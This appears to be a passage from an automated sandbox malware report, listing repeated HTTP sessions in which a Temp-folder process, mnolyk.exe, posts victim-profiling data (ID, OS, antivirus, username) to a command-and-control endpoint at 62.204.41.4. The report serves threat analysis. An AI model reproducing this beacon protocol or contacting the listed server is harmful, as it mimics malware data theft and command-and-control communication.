                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    519192.168.2.35022262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:48.324981928 CET719OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:48.386904955 CET719INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    52192.168.2.34975462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:29.621346951 CET253OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:29.685875893 CET253INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    520192.168.2.35022362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:48.562670946 CET719OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:48.625063896 CET720INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    521 | 192.168.2.3 | 50224 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:48.800409079 CET | 720 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:48.866019011 CET | 721 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    522 | 192.168.2.3 | 50225 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:49.051203012 CET | 721 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:49.116024971 CET | 722 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    523 | 192.168.2.3 | 50226 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:49.297652006 CET | 722 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:49.361480951 CET | 723 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    524 | 192.168.2.3 | 50227 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:49.587647915 CET | 723 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:49.650621891 CET | 724 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    525 | 192.168.2.3 | 50228 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:49.973795891 CET | 724 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:50.039262056 CET | 725 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    526 | 192.168.2.3 | 50229 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:50.275674105 CET | 725 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:50.339781046 CET | 726 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    527 | 192.168.2.3 | 50230 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:51.181015968 CET | 726 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:51.248961926 CET | 727 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    528 | 192.168.2.3 | 50231 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:51.521867037 CET | 727 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:51.585773945 CET | 728 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    529 | 192.168.2.3 | 50232 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:53.216896057 CET | 728 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:53.281989098 CET | 729 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    53 | 192.168.2.3 | 49755 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:29.861684084 CET | 254 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:29.925134897 CET | 254 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    530 | 192.168.2.3 | 50233 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:53.481596947 CET | 729 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:53.546242952 CET | 730 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    531 | 192.168.2.3 | 50234 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:53.720356941 CET | 730 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:53.786386013 CET | 731 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    532 | 192.168.2.3 | 50235 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:53.957839966 CET | 731 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:54.021266937 CET | 732 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    533 | 192.168.2.3 | 50236 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:54.215832949 CET | 732 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:54.281761885 CET | 733 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    534 | 192.168.2.3 | 50237 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:54.456114054 CET | 733 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:54.520998955 CET  734                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                    535         192.168.2.3  50238        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp                           kBytes transferred  Direction  Data
                                                                    Feb 8, 2023 21:33:54.690315008 CET  734                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:54.753885984 CET  735                 IN         HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
